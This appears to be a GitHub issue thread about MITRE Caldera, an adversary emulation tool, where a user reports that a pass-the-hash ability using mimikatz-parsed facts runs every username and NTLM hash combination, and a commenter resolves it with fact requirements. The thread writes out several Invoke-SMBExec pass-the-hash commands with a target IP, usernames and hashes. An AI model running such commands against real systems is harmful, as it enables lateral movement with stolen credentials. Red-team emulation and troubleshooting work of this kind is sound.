### ISSUE TITLE
Duplicate execution of parsed facts from mimikatz

### ISSUE THREAD

**Issue by fsor-01** [mitre/caldera#2628]
**Describe the bug**
Duplicate execution of facts from mimikatz.  I am trying to create an adversary profile where parsed data from mimikatz "data.user.name" and "data.user.ntlm" can be used for PTH using Invoke-SMBExec.  When launching the profile, instead of doing user1:hash1 , it is doing all combination of all user and hash that will eventually result into lockout.

![image](https://user-images.githubusercontent.com/68722442/182073601-f95ed0a4-dec2-4930-ba93-fb021eb17303.png)
![image](https://user-images.githubusercontent.com/68722442/182073674-64953260-79d4-405f-af0d-57d3ac777184.png)

It is doing the following: 

Invoke-SMBExec -Target 192.168.100.20   -Username elliot.alderson -Hash 632B06C75304AB6D074B8ED8B73CF98B   
Invoke-SMBExec -Target 192.168.100.20   -Username angela.moss -Hash 7100a909c7ff05b266af3c42ec058c33
Invoke-SMBExec -Target 192.168.100.20   -Username elliot.alderson -Hash 7100a909c7ff05b266af3c42ec058c33
Invoke-SMBExec -Target 192.168.100.20   -Username angela.moss -Hash 632B06C75304AB6D074B8ED8B73CF98B

**To Reproduce**

1.  Create adversay profile and user PowerKatz Staged
2.  Create custom ability Invoke-SMBExec (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1)
3.  Commands for SMBExec " Invoke-SMBExec -Target 10.10.11.14 -Username #{domain.user.name} -Hash #{domain.user.ntlm} "
4. Target machine should have atleast 2 logged on domain users t

**Expected behavior**

PTH should use 1:1 mapping. If there's 2 user with 2 ntlm hash, should do the following:

Invoke-SMBExec -Target 192.168.100.20   -Username elliot.alderson -Hash 632B06C75304AB6D074B8ED8B73CF98B
Invoke-SMBExec -Target 192.168.100.20   -Username angela.moss -Hash 7100a909c7ff05b266af3c42ec058c33

**Screenshots**

**Desktop (please complete the following information):**

 - Browser : Chrome 
 -  Ubuntu 22.04 LTS
 - Caldera 4.0.0

**Additional context**
N/A

**Comment by Florablia** [comment]
Hi, 
I'm not for Caldera, but I don't think this is a bug. Your custom ability is getting facts regardless of their relationships; you have to add a Requirement to tell your ability that you want to use facts that are related. 
Also I suggest posting on the team slack. You'll have more chances to get answers.

**Comment by fsor-01** [comment]
@Florablia you are right. Was able to correct the intended function by adding this requirements to my custom ability

![image](https://user-images.githubusercontent.com/68722442/182281163-8c6b567b-6f66-467d-8b29-62eb50891960.png)

and by also adding new-source facts when creating the operation. 

![image](https://user-images.githubusercontent.com/68722442/182281326-0076e742-80d4-47e1-b1ac-6356010fca80.png)


The operation worked as intended now .  Thanks!
